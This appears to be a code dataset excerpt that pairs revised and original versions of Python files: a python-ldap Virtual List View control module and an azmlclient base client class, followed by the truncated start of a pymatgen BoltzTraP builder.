        self.greater_than_or_equal = greater_than_or_equal
        self.context_id = context_id
    def encodeControlValue(self):
        """BER-encode the request value from the instance attributes.

        NOTE(review): self.context_id is accepted by __init__ but is not
        encoded here (the optional contextID component is never set) --
        confirm this matches upstream intent before relying on it.
        """
        p = VirtualListViewRequestType()
        p.setComponentByName('beforeCount', self.before_count)
        p.setComponentByName('afterCount', self.after_count)
        if self.offset is not None and self.content_count is not None:
            by_offset = ByOffsetType()
            by_offset.setComponentByName('offset', self.offset)
            by_offset.setComponentByName('contentCount', self.content_count)
            target = TargetType()
            target.setComponentByName('byOffset', by_offset)
        elif self.greater_than_or_equal:
            target = TargetType()
            target.setComponentByName('greaterThanOrEqual',
                                      self.greater_than_or_equal)
        else:
            # Unreachable after __init__ validation; kept as a safety net.
            raise NotImplementedError
        p.setComponentByName('target', target)
        return encoder.encode(p)
# NOTE(review): registers a *request* control in the response-control table;
# this mirrors upstream python-ldap -- confirm intended.
KNOWN_RESPONSE_CONTROLS[VLVRequestControl.controlType] = VLVRequestControl
class VirtualListViewResultType(univ.Enumerated):
    # ENUMERATED result code of a VLV response; values follow the standard
    # LDAP result codes. NOTE: 'innapropriateMatching' (sic) is kept as-is --
    # renaming the pyasn1 named value would change decoding behavior.
    namedValues = namedval.NamedValues(
        ('success', 0),
        ('operationsError', 1),
        ('protocolError', 3),
        ('unwillingToPerform', 53),
        ('insufficientAccessRights', 50),
        ('adminLimitExceeded', 11),
        ('innapropriateMatching', 18),
        ('sortControlMissing', 60),
        ('offsetRangeError', 61),
        ('other', 80),
    )
class VirtualListViewResponseType(univ.Sequence):
    # ASN.1 VirtualListViewResponse ::= SEQUENCE {
    #   targetPosition INTEGER, contentCount INTEGER,
    #   virtualListViewResult ENUMERATED, contextID OCTET STRING OPTIONAL }
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('targetPosition', univ.Integer()),
        namedtype.NamedType('contentCount', univ.Integer()),
        namedtype.NamedType('virtualListViewResult',
                            VirtualListViewResultType()),
        namedtype.OptionalNamedType('contextID', univ.OctetString()))
class VLVResponseControl(ResponseControl):
    """LDAP Virtual List View response control (2.16.840.1.113730.3.4.10)."""
    controlType = '2.16.840.1.113730.3.4.10'
    def __init__(self, criticality=False):
        ResponseControl.__init__(self, self.controlType, criticality)
    def decodeControlValue(self, encoded):
        """Decode the BER-encoded response value and populate attributes."""
        decoded, trailing = decoder.decode(encoded, asn1Spec=VirtualListViewResponseType())
        assert not trailing, 'all data could not be decoded'
        self.targetPosition = int(decoded.getComponentByName('targetPosition'))
        self.contentCount = int(decoded.getComponentByName('contentCount'))
        self.virtualListViewResult = int(decoded.getComponentByName('virtualListViewResult'))
        ctx = decoded.getComponentByName('contextID')
        self.contextID = str(ctx) if ctx.hasValue() else None
        # backward compatibility class attributes
        self.target_position = self.targetPosition
        self.content_count = self.contentCount
        self.result = self.virtualListViewResult
        self.context_id = self.contextID
KNOWN_RESPONSE_CONTROLS[VLVResponseControl.controlType] = VLVResponseControl | lib/python3.7/site-packages/ldap/controls/vlv.py | __all__ = [
'VLVRequestControl',
'VLVResponseControl',
]
import ldap
from ldap.ldapobject import LDAPObject
from ldap.controls import (RequestControl, ResponseControl,
KNOWN_RESPONSE_CONTROLS, DecodeControlTuples)
from pyasn1.type import univ, namedtype, tag, namedval, constraint
from pyasn1.codec.ber import encoder, decoder
class ByOffsetType(univ.Sequence):
    # ASN.1 (draft-ietf-ldapext-ldapv3-vlv-09):
    #   byOffset [0] SEQUENCE { offset INTEGER, contentCount INTEGER }
    # The implicit context tag 0 distinguishes this arm inside TargetType.
    tagSet = univ.Sequence.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('offset', univ.Integer()),
        namedtype.NamedType('contentCount', univ.Integer()))
class TargetType(univ.Choice):
    # ASN.1 CHOICE locating the target entry of the list view:
    #   byOffset           [0] -- absolute position (see ByOffsetType)
    #   greaterThanOrEqual [1] AssertionValue -- first entry >= this value
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('byOffset', ByOffsetType()),
        namedtype.NamedType('greaterThanOrEqual', univ.OctetString().subtype(
            implicitTag=tag.Tag(tag.tagClassContext,
                                tag.tagFormatSimple, 1))))
class VirtualListViewRequestType(univ.Sequence):
    # ASN.1 VirtualListViewRequest ::= SEQUENCE {
    #   beforeCount INTEGER, afterCount INTEGER,
    #   target CHOICE, contextID OCTET STRING OPTIONAL }
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('beforeCount', univ.Integer()),
        namedtype.NamedType('afterCount', univ.Integer()),
        namedtype.NamedType('target', TargetType()),
        namedtype.OptionalNamedType('contextID', univ.OctetString()))
class VLVRequestControl(RequestControl):
    """LDAP Virtual List View request control (2.16.840.1.113730.3.4.9).

    See draft-ietf-ldapext-ldapv3-vlv-09. The target entry is addressed
    either by absolute position (`offset` together with `content_count`)
    or by an assertion value (`greater_than_or_equal`); exactly one of the
    two forms must be supplied.
    """
    controlType = '2.16.840.1.113730.3.4.9'
    def __init__(
        self,
        criticality=False,
        before_count=0,
        after_count=0,
        offset=None,
        content_count=None,
        greater_than_or_equal=None,
        context_id=None,
    ):
        """
        :param before_count: number of entries requested before the target
        :param after_count: number of entries requested after the target
        :param offset: offset of the target entry (used with content_count)
        :param content_count: client's estimate of the list size (used with offset)
        :param greater_than_or_equal: assertion value locating the target entry
        :param context_id: opaque context returned by a previous VLV response
        :raises ValueError: when neither addressing form is fully specified
        """
        RequestControl.__init__(self,self.controlType,criticality)
        # Bug fix: this used `assert cond, ValueError(...)`, which raises
        # AssertionError (never the ValueError built as its message) and is
        # stripped entirely under `python -O`; validate explicitly instead.
        if not ((offset is not None and content_count is not None) or
                greater_than_or_equal):
            raise ValueError(
                'offset and content_count must be set together or greater_than_or_equal must be used'
            )
        self.before_count = before_count
        self.after_count = after_count
        self.offset = offset
        self.content_count = content_count
        self.greater_than_or_equal = greater_than_or_equal
        self.context_id = context_id
    def encodeControlValue(self):
        """BER-encode the request value from the instance attributes.

        NOTE(review): self.context_id is accepted by __init__ but is not
        encoded here (the optional contextID component is never set) --
        confirm this matches upstream intent before relying on it.
        """
        p = VirtualListViewRequestType()
        p.setComponentByName('beforeCount', self.before_count)
        p.setComponentByName('afterCount', self.after_count)
        if self.offset is not None and self.content_count is not None:
            by_offset = ByOffsetType()
            by_offset.setComponentByName('offset', self.offset)
            by_offset.setComponentByName('contentCount', self.content_count)
            target = TargetType()
            target.setComponentByName('byOffset', by_offset)
        elif self.greater_than_or_equal:
            target = TargetType()
            target.setComponentByName('greaterThanOrEqual',
                                      self.greater_than_or_equal)
        else:
            # Unreachable after __init__ validation; kept as a safety net.
            raise NotImplementedError
        p.setComponentByName('target', target)
        return encoder.encode(p)
# NOTE(review): registers a *request* control in the response-control table;
# this mirrors upstream python-ldap -- confirm intended.
KNOWN_RESPONSE_CONTROLS[VLVRequestControl.controlType] = VLVRequestControl
class VirtualListViewResultType(univ.Enumerated):
    # ENUMERATED result code of a VLV response; values follow the standard
    # LDAP result codes. NOTE: 'innapropriateMatching' (sic) is kept as-is --
    # renaming the pyasn1 named value would change decoding behavior.
    namedValues = namedval.NamedValues(
        ('success', 0),
        ('operationsError', 1),
        ('protocolError', 3),
        ('unwillingToPerform', 53),
        ('insufficientAccessRights', 50),
        ('adminLimitExceeded', 11),
        ('innapropriateMatching', 18),
        ('sortControlMissing', 60),
        ('offsetRangeError', 61),
        ('other', 80),
    )
class VirtualListViewResponseType(univ.Sequence):
    # ASN.1 VirtualListViewResponse ::= SEQUENCE {
    #   targetPosition INTEGER, contentCount INTEGER,
    #   virtualListViewResult ENUMERATED, contextID OCTET STRING OPTIONAL }
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('targetPosition', univ.Integer()),
        namedtype.NamedType('contentCount', univ.Integer()),
        namedtype.NamedType('virtualListViewResult',
                            VirtualListViewResultType()),
        namedtype.OptionalNamedType('contextID', univ.OctetString()))
class VLVResponseControl(ResponseControl):
    """LDAP Virtual List View response control (2.16.840.1.113730.3.4.10)."""
    controlType = '2.16.840.1.113730.3.4.10'
    def __init__(self, criticality=False):
        ResponseControl.__init__(self, self.controlType, criticality)
    def decodeControlValue(self, encoded):
        """Decode the BER-encoded response value and populate attributes."""
        decoded, trailing = decoder.decode(encoded, asn1Spec=VirtualListViewResponseType())
        assert not trailing, 'all data could not be decoded'
        self.targetPosition = int(decoded.getComponentByName('targetPosition'))
        self.contentCount = int(decoded.getComponentByName('contentCount'))
        self.virtualListViewResult = int(decoded.getComponentByName('virtualListViewResult'))
        ctx = decoded.getComponentByName('contextID')
        self.contextID = str(ctx) if ctx.hasValue() else None
        # backward compatibility class attributes
        self.target_position = self.targetPosition
        self.content_count = self.contentCount
        self.result = self.virtualListViewResult
        self.context_id = self.contextID
KNOWN_RESPONSE_CONTROLS[VLVResponseControl.controlType] = VLVResponseControl | 0.624408 | 0.245277 |
import sys
from contextlib import contextmanager
from inspect import getmembers, isroutine
from logging import getLogger, StreamHandler, INFO
from warnings import warn
try: # python 3+
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
try: # python 3.5+
from typing import Dict, List, Callable, Union, Optional
from logging import Logger
except ImportError:
pass
from decopatch import function_decorator, DECORATED
from makefun import wraps
from requests import Session
import pandas as pd
from azmlclient.clients_callmodes import CallMode, Batch, RequestResponse, LocalCallMode
from azmlclient.clients_config import ClientConfig
from azmlclient.utils_requests import debug_requests
# default logger that may be used by clients; logs to stdout at INFO level
default_logger = getLogger('azmlclient')
ch = StreamHandler(sys.stdout)
default_logger.addHandler(ch)
default_logger.setLevel(INFO)
# attribute name used by @azureml_service to tag methods with their service name
AZML_SERVICE_ID = '__azml_service__'
class LocalCallModeNotAllowed(Exception):
    """
    Raised when a service method declared with `remote_only=True` is invoked
    while the client is in local call mode.
    """
    __slots__ = 'f',

    def __init__(self, f):
        super(LocalCallModeNotAllowed, self).__init__()
        self.f = f

    def __str__(self):
        return repr(self)

    def __repr__(self):
        service = get_azureml_service_name(self.f)
        msg = "function '%s' (service '%s') is remote-only and can not be executed in local mode " \
              "(`allow_local=False`). Please change call mode to request-response or batch before using it."
        return msg % (self.f.__name__, service)
@function_decorator
def azureml_service(service_name=None, # type: str
                    remote_only=False, # type: bool
                    f=DECORATED,
                    ):
    """
    A decorator for methods in your `AzureMLClient` subclasses, that you should use to indicate that a given method
    corresponds to an AzureML service. That way, the `AzureMLClient` base class will be able to link this method
    with local implementation and with the service configuration (url, api key).
    This decorator performs two things:
    - It wraps the decorated method into a method able to route "local"-mode calls to `self.call_local_service`
    - It adds the `AZML_SERVICE_ID` attribute with the `service_name` so that the method is known as being
    AzureML-related, and therefore the appropriate service configuration can be looked up.
    :param service_name: the optional service name appearing in the `AzureMLClient` configuration (`ClientConfig`). By
        default this is `None` and means that the method name should be used as the service name.
    :param remote_only: a boolean (default False) indicating if a service should be considered remote-only. If True, an
        appropriate exception will be raised if the service is used in local mode.
    """
    @wraps(f)
    def f_wrapper(self, # type: AzureMLClient
                  *args,
                  **kwargs):
        """
        Routes the call to the local implementation when the client is in
        local call mode; otherwise executes the decorated method as-is.

        :param self: the AzureMLClient instance the method is bound to
        :param args: positional arguments forwarded to the service method
        :param kwargs: keyword arguments forwarded to the service method
        :return: the service result (from the local implementor or the remote call)
        """
        if self.is_local_mode():
            if not remote_only:
                # execute the same method on local implementor rather than client.
                return self.call_local_service(f.__name__, *args, **kwargs)
            else:
                # remote-only service invoked in local mode
                raise LocalCallModeNotAllowed(f_wrapper)
        else:
            # execute as usual
            return f(self, *args, **kwargs)
    # tag the method as being related to an AzureML service with given id
    setattr(f_wrapper, AZML_SERVICE_ID, service_name)
    return f_wrapper
def get_azureml_service_name(f):
    """
    Returns the AzureML service name associated with method `f`.

    :param f: a function or (bound) method decorated with @azureml_service
    :return: the explicit service name set by the decorator, or the function
        name when the decorator did not specify one
    """
    # Work on the underlying function when given a bound (instance) method
    func = getattr(f, '__func__', f)
    if not hasattr(func, AZML_SERVICE_ID):
        raise ValueError("Method '%s' can not be bound to an AzureML service, please decorate it with "
                         "@azureml_service." % func.__name__)
    azml_name = getattr(func, AZML_SERVICE_ID)
    return azml_name if azml_name is not None else func.__name__
class AzureMLClient:
    """
    Base class for AzureML clients.
    A client is configured with a mandatory `ClientConfig` object describing global and per-service options (endpoint
    urls, api keys).
    It provides a way to create them from a configuration containing endpoint definitions,
    and to declare a local implementation
    """
    def __init__(self,
                 client_config, # type: ClientConfig
                 logger=default_logger, # type: Logger
                 default_call_mode=None, # type: CallMode
                 requests_session=None, # type: Session
                 auto_close_session=None # type: bool
                 ):
        """
        Creates an `AzureMLClient` with an initial `ClientConfig` containing the global and per-service configurations.
        Constructor with a global configuration and service endpoint configurations. The service endpoint
        configurations should be provided in a dictionary with keys being the service names. Only names declared in the
        'services' meta attribute of the class will be accepted, otherwise and error will be raised. Note that you may
        provide configurations for some services only.
        A `requests.Session` object is automatically created when the client is created, and possibly configured with
        the proxy information obtained from the `ClientConfig`. The `Session` is automatically closed when the client
        instance is garbaged out. A custom `Session` can be passed to the constructor instead. It won't be closed nor
        configured by default, the user should do it (using `session.close()` and `<config>.configure_session(session)`
        respectively).
        :param client_config: a configuration for this component client. It should be valid = contain sections for
            each service in this client. The configuration can contain proxy information, in which case it will
            be used to configure the underlying requests Session that is created.
        :param logger:
        :param default_call_mode: (advanced) if a non-None `CallMode` instance is provided, it will be used as the
            default call mode for this client. Otherwise by default a request-response call mode will be set as the
            default call mode (`RequestResponse()`)
        :param requests_session: (advanced) an optional `Session` object to use (from `requests` lib). If `None` is
            provided, a new `Session` will be used, possibly configured with the proxy information in the `ClientConfig`
            and deleted when this object is garbaged out. If a custom object is provided, you should close it yourself
            or switch `auto_close_session` to `True` explicitly. You should also configure it yourself, for example
            with `<config>.configure_session(session)`.
        :param auto_close_session: an optional boolean indicating if `self.session` should be closed when this object
            is garbaged out. By default this is `None` and means "`True` if no custom `requests_session` is passed, else
            `False`"). Turning this to `False` can leave hanging Sockets unclosed.
        """
        # save the attributes (client_config is validated by the property setter)
        self.client_config = client_config
        self.logger = logger
        if default_call_mode is None:
            # by default make this a request response
            default_call_mode = RequestResponse()
        self._current_call_mode = default_call_mode
        # init the local impl property (created lazily by `local_impl`)
        self._local_impl = None
        if requests_session is None:
            # create and configure a session
            self.session = Session()
            self.global_cfg.configure_session(self.session)
        else:
            # custom provided : do not configure it
            self.session = requests_session
        # auto-close behaviour
        if auto_close_session is None:
            # default: only auto-close if this session was created by us.
            auto_close_session = requests_session is None
        self.auto_close_session = auto_close_session
    def __del__(self):
        """
        This is called when the garbage collector deletes this object.
        Let's use this opportunity to close the requests Session to avoid
        leaving hanging Sockets, see https://github.com/smarie/python-odsclient/issues/27
        """
        if self.auto_close_session and self.session is not None:
            try:
                # close the underlying `requests.Session`
                self.session.close()
            except Exception as e:
                warn("Error while closing session: %r" % e)
    # --------- remote service calls implementation
    @property
    def service_methods(self):
        """
        returns a dictionary of all service methods referenced by AzureML service name.
        These are all methods in the class that have been decorated with `@azureml_service`
        :return:
        """
        return {get_azureml_service_name(v[1]): v[1]
                for v in getmembers(self.__class__, predicate=lambda x: isroutine(x) and hasattr(x, AZML_SERVICE_ID))}
    @property
    def service_names(self):
        """
        Returns the list of all service names - basically the names of the `service_methods`
        :return:
        """
        return self.service_methods.keys()
    # --------- local implementor
    def __init_local_impl__(self):
        """
        Implementors should create a local implementation and return it
        :return:
        """
        raise NotImplementedError("Local execution is not available for this client. Please override "
                                  "`__init_local_impl__` or set a non-none `self._local_impl` if you wish local calls "
                                  "to be made available")
    @property
    def local_impl(self):
        # lazily created on first access
        if self._local_impl is None:
            self._local_impl = self.__init_local_impl__()
        return self._local_impl
    def call_local_service(self,
                           function_name, # type: str
                           *args, **kwargs):
        """
        This method is called automatically when a service method (i.e. decorated with `@azureml_service`)
        is called and this instance is in "local" mode. It delegates to local.
        :param function_name: name of the service method to execute locally
        :param args:
        :param kwargs:
        :return:
        """
        local_provider = self.local_impl
        local_method = getattr(local_provider, function_name)
        return local_method(*args, **kwargs)
    # --------- configuration
    @property
    def client_config(self):
        return self._client_config
    @client_config.setter
    def client_config(self,
                      client_config # type: ClientConfig
                      ):
        # validate configuration before accepting it
        client_config.assert_valid_for_services(self.service_names)
        self._client_config = client_config
    # ------ convenience methods
    @property
    def global_cfg(self):
        return self.client_config.global_config
    @property
    def services_cfg_dct(self):
        return self.client_config.services_configs
    # ------ call modes
    @property
    def current_call_mode(self):
        if self._current_call_mode is None:
            raise ValueError("Current call mode is None. Please set a call mode (local, rr, batch...) by using the "
                             "appropriate context manager")
        return self._current_call_mode
    @current_call_mode.setter
    def current_call_mode(self, current_call_mode):
        self._current_call_mode = current_call_mode
    def is_local_mode(self):
        """
        Returns True when the current call mode executes against the local implementation.
        :return:
        """
        return isinstance(self.current_call_mode, LocalCallMode)
    # --- context managers to switch call mode
    def local_calls(self):
        """
        Alias for the `call_mode` context manager to temporarily switch this client to 'local' mode
        >>> with client.local_calls():
        >>>     client.my_service(foo)
        """
        return self.call_mode(LocalCallMode())
    def rr_calls(self,
                 use_swagger_format=False # type: bool
                 ):
        """
        Alias for the `call_mode` context manager to temporarily switch this client to 'request response' mode
        >>> with client.rr_calls():
        >>>     client.my_service(foo)
        """
        return self.call_mode(RequestResponse(use_swagger_format=use_swagger_format))
    def batch_calls(self,
                    polling_period_seconds=5, # type: int
                    ):
        """
        Alias for the `call_mode` context manager to temporarily switch this client to 'batch' mode
        >>> with client.batch_calls(polling_period_seconds=5):
        >>>     client.my_service(foo)
        """
        return self.call_mode(Batch(polling_period_seconds=polling_period_seconds))
    @contextmanager
    def call_mode(self,
                  mode # type: CallMode
                  ):
        """
        Context manager to temporarily switch this client to `mode` CallMode
        >>> with client.call_mode(Batch(polling_period_seconds=20)):
        >>>     client.my_service(foo)
        :param mode: the `CallMode` to switch to
        :return:
        """
        previous_mode = self.current_call_mode
        self.current_call_mode = mode
        try:
            yield
        finally:
            # Bug fix: restore the previous call mode even when the body
            # raises; previously an exception left the client stuck in `mode`.
            self.current_call_mode = previous_mode
    def debug_requests(self):
        """
        Context manager to temporarily enable debug mode on requests.
        :return:
        """
        return debug_requests()
    # ------
    def call_azureml(self,
                     service_id, # type: Union[str, Callable]
                     ws_inputs, # type: Dict[str, pd.DataFrame]
                     ws_output_names, # type: Optional[List[str]]
                     ws_params=None, # type: Dict[str, str]
                     ):
        """
        Calls the service identified with id service_id in the services configuration.
        Inputs
        :param service_id: a string identifier or a method representing the service
        :param ws_inputs: a (name, DataFrame) dictionary of web service inputs
        :param ws_output_names: a list of web service outputs, or `None` to allow all outputs to be received
        :param ws_params: a (param_name, value) dictionary of web service parameters
        :return:
        """
        # -- one can provide a method as the service id
        if callable(service_id):
            service_id = get_azureml_service_name(service_id)
        # -- Retrieve service configuration
        if service_id not in self.client_config.services_configs.keys():
            raise ValueError('Unknown service_id: \'' + service_id + '\'')
        else:
            service_config = self.client_config.services_configs[service_id]
        # -- Perform call according to options
        return self.current_call_mode.call_azureml(service_id,
                                                   service_config=service_config, ws_inputs=ws_inputs,
                                                   ws_output_names=ws_output_names, ws_params=ws_params,
                                                   session=self.session)
def unpack_single_value_from_df(name, # type: str
df, # type: pd.DataFrame
allow_empty=True # type: bool
):
"""
Utility method to unpack a single value from a DataFrame.
If allow_empty is True (default), an empty DataFrame will be accepted and None will be returned.
:param name: the name of the DataFrame, for validation purposes
:param df:
:param allow_empty:
:return:
"""
values = df.values.ravel()
if len(values) == 1:
return values[0]
elif len(values) == 0 and allow_empty:
return None
else:
raise ValueError("DataFrame '%s' is supposed to contain a single value but does not: \n%s" % (name, df)) | azmlclient/clients.py | import sys
from contextlib import contextmanager
from inspect import getmembers, isroutine
from logging import getLogger, StreamHandler, INFO
from warnings import warn
try: # python 3+
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
try: # python 3.5+
from typing import Dict, List, Callable, Union, Optional
from logging import Logger
except ImportError:
pass
from decopatch import function_decorator, DECORATED
from makefun import wraps
from requests import Session
import pandas as pd
from azmlclient.clients_callmodes import CallMode, Batch, RequestResponse, LocalCallMode
from azmlclient.clients_config import ClientConfig
from azmlclient.utils_requests import debug_requests
# default logger that may be used by clients
default_logger = getLogger('azmlclient')
ch = StreamHandler(sys.stdout)
default_logger.addHandler(ch)
default_logger.setLevel(INFO)
AZML_SERVICE_ID = '__azml_service__'
class LocalCallModeNotAllowed(Exception):
"""
Exception raised when users call a method corresponding to a
"""
__slots__ = 'f',
def __init__(self, f):
self.f = f
super(LocalCallModeNotAllowed, self).__init__()
def __str__(self):
return repr(self)
def __repr__(self):
azml_service_name = get_azureml_service_name(self.f)
return "function '%s' (service '%s') is remote-only and can not be executed in local mode " \
"(`allow_local=False`). Please change call mode to request-response or batch before using it." \
% (self.f.__name__, azml_service_name)
@function_decorator
def azureml_service(service_name=None, # type: str
remote_only=False, # type: bool
f=DECORATED,
):
"""
A decorator for methods in your `AzureMLClient` subclasses, that you should use to indicate that a given method
corresponds to an AzureML service. That way, the `AzureMLClient` base class will be able to link this method
with local implementation and with the service configuration (url, api key).
This decorator performs two things:
- It wraps the decorated method into a method able to route "local"-mode calls to `self.call_local_service`
- It adds the `AZML_SERVICE_ID` attribute with the `service_name` so that the method is known as being
AzureML-related, and therefore the appropriate service configuration can be looked up.
:param service_name: the optional service name appearing in the `AzureMLClient` configuration (`ClientConfig`). By
default this is `None` and means that the method name should be used as the service name.
:param remote_only: a boolean (default False) indicating if a service should be considered remote-only. If True, an
appropriate exception will be raised if the service is used in local mode.
"""
@wraps(f)
def f_wrapper(self, # type: AzureMLClient
*args,
**kwargs):
"""
:param self:
:param args:
:param kwargs:
:return:
"""
if self.is_local_mode():
if not remote_only:
# execute the same method on local implementor rather than client.
return self.call_local_service(f.__name__, *args, **kwargs)
else:
raise LocalCallModeNotAllowed(f_wrapper)
else:
# execute as usual
return f(self, *args, **kwargs)
# tag the method as being related to an AzureML service with given id
setattr(f_wrapper, AZML_SERVICE_ID, service_name)
return f_wrapper
def get_azureml_service_name(f):
"""
Returns the AzureML service name associated with method `f`.
:param f:
:return:
"""
try:
# If this is the bound (=instance) method, get the unbound (=class) one
if hasattr(f, '__func__'):
f = f.__func__
azml_name = getattr(f, AZML_SERVICE_ID)
except AttributeError:
raise ValueError("Method '%s' can not be bound to an AzureML service, please decorate it with "
"@azureml_service." % f.__name__)
else:
return azml_name if azml_name is not None else f.__name__
class AzureMLClient:
"""
Base class for AzureML clients.
A client is configured with a mandatory `ClientConfig` object describing global and per-service options (endpoint
urls, api keys).
It provides a way to create them from a configuration containing endpoint definitions,
and to declare a local implementation
"""
def __init__(self,
client_config, # type: ClientConfig
logger=default_logger, # type: Logger
default_call_mode=None, # type: CallMode
requests_session=None, # type: Session
auto_close_session=None # type: bool
):
"""
Creates an `AzureMLClient` with an initial `ClientConfig` containing the global and per-service configurations.
Constructor with a global configuration and service endpoint configurations. The service endpoint
configurations should be provided in a dictionary with keys being the service names. Only names declared in the
'services' meta attribute of the class will be accepted, otherwise and error will be raised. Note that you may
provide configurations for some services only.
A `requests.Session` object is automatically created when the client is created, and possibly configured with
the proxy information obtained from the `ClientConfig`. The `Session` is automatically closed when the client
instance is garbaged out. A custom `Session` can be passed to the constructor instead. It won't be closed nor
configured by default, the user should do it (using `session.close()` and `<config>.configure_session(session)`
respectively).
:param client_config: a configuration for this component client. It should be valid = contain sections for
each service in this client. The configuration can contain proxy information, in which case it will
be used to configure the underlying requests Session that is created.
:param logger:
:param default_call_mode: (advanced) if a non-None `CallMode` instance is provided, it will be used as the
default call mode for this client. Otherwise by default a request-response call mode will be set as the
default call mode (`RequestResponse()`)
:param requests_session: (advanced) an optional `Session` object to use (from `requests` lib). If `None` is
provided, a new `Session` will be used, possibly configured with the proxy information in the `ClientConfig`
and deleted when this object is garbaged out. If a custom object is provided, you should close it yourself
or switch `auto_close_session` to `True` explicitly. You should also configure it yourself, for example
with `<config>.configure_session(session)`.
:param auto_close_session: an optional boolean indicating if `self.session` should be closed when this object
is garbaged out. By default this is `None` and means "`True` if no custom `requests_session` is passed, else
`False`"). Turning this to `False` can leave hanging Sockets unclosed.
"""
# save the attributes
self.client_config = client_config
self.logger = logger
if default_call_mode is None:
# by default make this a request response
default_call_mode = RequestResponse()
self._current_call_mode = default_call_mode
# init the local impl property
self._local_impl = None
if requests_session is None:
# create and configure a session
self.session = Session()
self.global_cfg.configure_session(self.session)
else:
# custom provided : do not configure it
self.session = requests_session
# auto-close behaviour
if auto_close_session is None:
# default: only auto-close if this session was created by us.
auto_close_session = requests_session is None
self.auto_close_session = auto_close_session
def __del__(self):
"""
This is called when the garbage collector deletes this object.
Let's use this opportunity to close the requests Session to avoid
leaving hanging Sockets, see https://github.com/smarie/python-odsclient/issues/27
"""
if self.auto_close_session and self.session is not None:
try:
# close the underlying `requests.Session`
self.session.close()
except Exception as e:
warn("Error while closing session: %r" % e)
# --------- remote service calls implementation
@property
def service_methods(self):
"""
returns a dictionary of all service methods referenced by AzureML service name.
These are all methods in the class that have been decorated with `@azureml_service`
:return:
"""
return {get_azureml_service_name(v[1]): v[1]
for v in getmembers(self.__class__, predicate=lambda x: isroutine(x) and hasattr(x, AZML_SERVICE_ID))}
@property
def service_names(self):
"""
Returns the list of all service names - basically the names of the `service_methods`
:return:
"""
return self.service_methods.keys()
# --------- local implementor
def __init_local_impl__(self):
"""
Implementors should create a local implementation and return it
:return:
"""
raise NotImplementedError("Local execution is not available for this client. Please override "
"`__init_local_impl__` or set a non-none `self._local_impl` if you wish local calls "
"to be made available")
@property
def local_impl(self):
if self._local_impl is None:
self._local_impl = self.__init_local_impl__()
return self._local_impl
def call_local_service(self,
function_name, # type: str
*args, **kwargs):
"""
This method is called automatically when a service method (i.e. decorated with `@azureml_service`)
is called and this instance is in "local" mode. It delegates to local.
:param function_name:
:param args:
:param kwargs:
:return:
"""
local_provider = self.local_impl
local_method = getattr(local_provider, function_name)
return local_method(*args, **kwargs)
# --------- configuration
@property
def client_config(self):
return self._client_config
@client_config.setter
def client_config(self,
client_config # type: ClientConfig
):
# validate configuration before accepting it
client_config.assert_valid_for_services(self.service_names)
self._client_config = client_config
# ------ convenience methods
@property
def global_cfg(self):
return self.client_config.global_config
@property
def services_cfg_dct(self):
return self.client_config.services_configs
# ------ call modes
@property
def current_call_mode(self):
if self._current_call_mode is None:
raise ValueError("Current call mode is None. Please set a call mode (local, rr, batch...) by using the "
"appropriate context manager")
return self._current_call_mode
@current_call_mode.setter
def current_call_mode(self, current_call_mode):
self._current_call_mode = current_call_mode
def is_local_mode(self):
"""
:return:
"""
return isinstance(self.current_call_mode, LocalCallMode)
# --- context managers to switch call mode
def local_calls(self):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'local' mode
>>> with client.local_calls():
>>> client.my_service(foo)
"""
return self.call_mode(LocalCallMode())
def rr_calls(self,
use_swagger_format=False # type: bool
):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'request response' mode
>>> with client.rr_calls():
>>> client.my_service(foo)
"""
return self.call_mode(RequestResponse(use_swagger_format=use_swagger_format))
def batch_calls(self,
polling_period_seconds=5, # type: int
):
"""
Alias for the `call_mode` context manager to temporarily switch this client to 'batch' mode
>>> with client.batch_calls(polling_period_seconds=5):
>>> client.my_service(foo)
"""
return self.call_mode(Batch(polling_period_seconds=polling_period_seconds))
@contextmanager
def call_mode(self,
mode # type: CallMode
):
"""
Context manager to temporarily switch this client to `mode` CallMode
>>> with client.call_mode(Batch(polling_period_seconds=20)):
>>> client.my_service(foo)
:param mode: the `CallMode` to switch to
:return:
"""
previous_mode = self.current_call_mode
self.current_call_mode = mode
yield
self.current_call_mode = previous_mode
def debug_requests(self):
"""
Context manager to temporarily enable debug mode on requests.
:return:
"""
return debug_requests()
# ------
def call_azureml(self,
service_id, # type: Union[str, Callable]
ws_inputs, # type: Dict[str, pd.DataFrame]
ws_output_names, # type: Optional[List[str]]
ws_params=None, # type: Dict[str, str]
):
"""
Calls the service identified with id service_id in the services configuration.
Inputs
:param service_id: a string identifier or a method representing the service
:param ws_inputs: a (name, DataFrame) dictionary of web service inputs
:param ws_output_names: a list of web service outputs, or `None` to allow all outputs to be received
:param ws_params: a (param_name, value) dictionary of web service parameters
:return:
"""
# -- one can provide a method as the service id
if callable(service_id):
service_id = get_azureml_service_name(service_id)
# -- Retrieve service configuration
if service_id not in self.client_config.services_configs.keys():
raise ValueError('Unknown service_id: \'' + service_id + '\'')
else:
service_config = self.client_config.services_configs[service_id]
# -- Perform call according to options
return self.current_call_mode.call_azureml(service_id,
service_config=service_config, ws_inputs=ws_inputs,
ws_output_names=ws_output_names, ws_params=ws_params,
session=self.session)
def unpack_single_value_from_df(name, # type: str
df, # type: pd.DataFrame
allow_empty=True # type: bool
):
"""
Utility method to unpack a single value from a DataFrame.
If allow_empty is True (default), an empty DataFrame will be accepted and None will be returned.
:param name: the name of the DataFrame, for validation purposes
:param df:
:param allow_empty:
:return:
"""
values = df.values.ravel()
if len(values) == 1:
return values[0]
elif len(values) == 0 and allow_empty:
return None
else:
raise ValueError("DataFrame '%s' is supposed to contain a single value but does not: \n%s" % (name, df)) | 0.730866 | 0.132543 |
import logging
from datetime import datetime
from monty.json import jsanitize
from monty.tempfile import ScratchDir
from pymatgen.core.structure import Structure
from pymatgen.electronic_structure.boltztrap import BoltztrapRunner
from maggma.builders import Builder
__author__ = "<NAME> <<EMAIL>>"
class BoltztrapDosBuilder(Builder):
def __init__(self,
materials,
boltztrap,
bandstructure_fs="bandstructure_fs",
btz_cdos_fs=None,
query=None,
**kwargs):
"""
